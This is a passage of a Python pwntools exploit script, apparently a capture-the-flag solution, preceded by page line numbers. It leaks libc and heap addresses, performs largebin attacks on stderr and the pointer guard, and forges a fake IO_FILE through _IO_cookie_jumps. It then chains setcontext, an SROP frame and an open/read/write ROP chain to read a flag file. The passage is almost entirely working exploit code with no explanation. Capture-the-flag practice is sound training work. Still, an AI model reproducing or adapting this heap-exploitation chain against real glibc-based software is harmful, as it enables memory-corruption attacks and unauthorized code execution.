1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143
| all_payload += payload
def delete(idx): global all_payload payload = p8(0x2) payload += p8(idx) all_payload += payload
def edit(idx, buf): global all_payload payload = p8(0x4) payload += p8(idx) payload += p16(len(buf)) payload += str(buf) all_payload += payload
def run_opcode(): global all_payload all_payload += p8(5) sh.sendafter("Pls input the opcode", all_payload) all_payload = ""
add(0, 0x410) add(1, 0x410) add(2, 0x420) add(3, 0x410) delete(2) add(4, 0x430) show(2) run_opcode()
libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1f30b0 log.success("libc_base:\t" + hex(libc_base)) libc.address = libc_base
guard = libc_base + 0x2035f0 pop_rdi_addr = libc_base + 0x2daa2 pop_rsi_addr = libc_base + 0x37c0a pop_rax_addr = libc_base + 0x446c0 syscall_addr = libc_base + 0x883b6 gadget_addr = libc_base + 0x146020 setcontext_addr = libc_base + 0x50bc0
edit(2, "a" * 0x10) show(2) run_opcode() sh.recvuntil("a" * 0x10) heap_base = u64(sh.recv(6).ljust(8, '\x00')) - 0x2ae0 log.success("heap_base:\t" + hex(heap_base))
delete(0) edit(2, p64(libc_base + 0x1f30b0) * 2 + p64(heap_base + 0x2ae0) + p64(libc.sym['stderr'] - 0x20)) add(5, 0x430) edit(2, p64(heap_base + 0x22a0) + p64(libc_base + 0x1f30b0) + p64(heap_base + 0x22a0) * 2) edit(0, p64(libc_base + 0x1f30b0) + p64(heap_base + 0x2ae0) * 3) add(0, 0x410) add(2, 0x420) run_opcode()
delete(2) add(6, 0x430) delete(0) edit(2, p64(libc_base + 0x1f30b0) * 2 + p64(heap_base + 0x2ae0) + p64(guard - 0x20)) add(7, 0x450) edit(2, p64(heap_base + 0x22a0) + p64(libc_base + 0x1f30b0) + p64(heap_base + 0x22a0) * 2) edit(0, p64(libc_base + 0x1f30b0) + p64(heap_base + 0x2ae0) * 3) add(2, 0x420) add(0, 0x410)
delete(7) add(8, 0x430) edit(7, 'a' * 0x438 + p64(0x300)) run_opcode()
next_chain = 0 srop_addr = heap_base + 0x2ae0 + 0x10 fake_IO_FILE = 2 * p64(0) fake_IO_FILE += p64(0) fake_IO_FILE += p64(0xffffffffffffffff) fake_IO_FILE += p64(0) fake_IO_FILE += p64(0) fake_IO_FILE += p64(0) fake_IO_FILE = fake_IO_FILE.ljust(0x58, '\x00') fake_IO_FILE += p64(next_chain) fake_IO_FILE = fake_IO_FILE.ljust(0x78, '\x00') fake_IO_FILE += p64(heap_base) fake_IO_FILE = fake_IO_FILE.ljust(0xB0, '\x00') fake_IO_FILE += p64(0) fake_IO_FILE = fake_IO_FILE.ljust(0xC8, '\x00') fake_IO_FILE += p64(libc.sym['_IO_cookie_jumps'] + 0x40) fake_IO_FILE += p64(srop_addr) fake_IO_FILE += p64(0) fake_IO_FILE += p64(ROL(gadget_addr ^ (heap_base + 0x22a0), 0x11))
fake_frame_addr = srop_addr frame = SigreturnFrame() frame.rdi = fake_frame_addr + 0xF8 frame.rsi = 0 frame.rdx = 0x100 frame.rsp = fake_frame_addr + 0xF8 + 0x10 frame.rip = pop_rdi_addr + 1
rop_data = [ pop_rax_addr, 2, syscall_addr,
pop_rax_addr, 0, pop_rdi_addr, 3, pop_rsi_addr, fake_frame_addr + 0x200, syscall_addr,
pop_rax_addr, 1, pop_rdi_addr, 1, pop_rsi_addr, fake_frame_addr + 0x200, syscall_addr ] payload = p64(0) + p64(fake_frame_addr) + '\x00' * 0x10 + p64(setcontext_addr + 61) payload += str(frame).ljust(0xF8, '\x00')[0x28:] + 'flag'.ljust(0x10, '\x00') + flat(rop_data)
edit(0, fake_IO_FILE) edit(2, payload)
add(8, 0x450)
run_opcode() sh.interactive()
|